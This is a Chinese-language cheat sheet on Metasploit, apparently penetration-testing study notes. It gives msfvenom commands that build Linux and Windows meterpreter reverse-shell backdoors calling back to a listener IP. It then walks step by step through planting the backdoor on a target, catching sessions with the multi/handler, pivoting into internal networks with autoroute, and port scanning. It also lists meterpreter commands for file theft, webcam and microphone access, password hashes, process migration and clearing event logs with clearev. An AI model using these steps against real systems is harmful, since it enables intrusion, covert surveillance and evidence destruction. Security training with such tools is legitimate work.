0x034 MSF
-
啟動msf msfconsole
-
先啟動msf依賴的postgresql數據庫
- 初始化數據庫 msfdb init (要用普通用戶)
-
-
msf路徑 /usr/share
-
制作后門 msfvenom
-
msfvenom -p payload腳本 lhost=監聽/攻擊機ip lport=端口 -f 文件類型 -o 文件名
-
linux示例
- msfvenom -p linux/x64/meterpreter/reverse_tcp lhost 192.168.223.129 lport=4444 -f elf -o shell
-
windows示例
- msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.223.129 lport=4444 -f exe -o shell.exe
-
-
遠控流程
-
連接后門
-
1.制作后門上傳到目標機並運行
- 詳見上一條
-
2.開啟msf並進入handle模塊
- use exploit/multi/handler
-
3.設置payload類型(必須與第一步一致)
- set payload payload名字
-
4.設置lhost和lport(與第一步生成的后門一致)
- set lhost 監聽ip
- set lport 監聽端口
-
5.options查看配置是否正確
-
6.run運行
-
進入meterpreter控制終端
-
執行shell可進入目標機終端
-
run可執行自帶腳本或post模塊
- 自帶腳本文件在/usr/share/metasploit-framework/script
- post模塊在/usr/share/metasploit-framework/modules/post
-
-
-
bg將進程放到后台,sessions查看,sessions 進程id 返回到進程
-
-
添加內網路由
(被控制的目標機只能訪問外網不能訪問內網,給它添加路由以訪問內網)- 1.連接上shell之后運行腳本 run get_local_subnets
- 2.run autoroute -s 內網網段 #例如192.168.223.0/24
- 3.run autoroute -p
-
內網掃描
-
1.用bg把進程放到后台,打開掃描端口模塊
- use auxiliary/scanner/portscan/tcp
-
2.設置主機段
- set rhosts 內網網段 (和上一小節一樣)
-
3.設置掃描端口
- set ports 端口1,端口2
-
4.設置線程
- set threads 線程數
-
5.run 執行腳本
-
back 退出當前模塊
-
-
端口轉發
- Portfwd
-
常用命令
-
核心命令
-
bg
-
sessions
-
load
- 和use一樣
-
run
-
-
文件操作
- cat
- cd
- cp
- dir
- download
- upload
- ls
- ps
- search
-
網絡命令
- if/ipcondig
- netstat
- portfwd
- getproxy
-
系統命令
- clearev
- kill
- shell
- powershell
- sysinfo
-
用戶界面命令
- screenshot
-
其他
-
攝像頭
-
麥克風
- 密碼哈希
-
-
-
-
進程注入
- migrate 被注入的進程號
-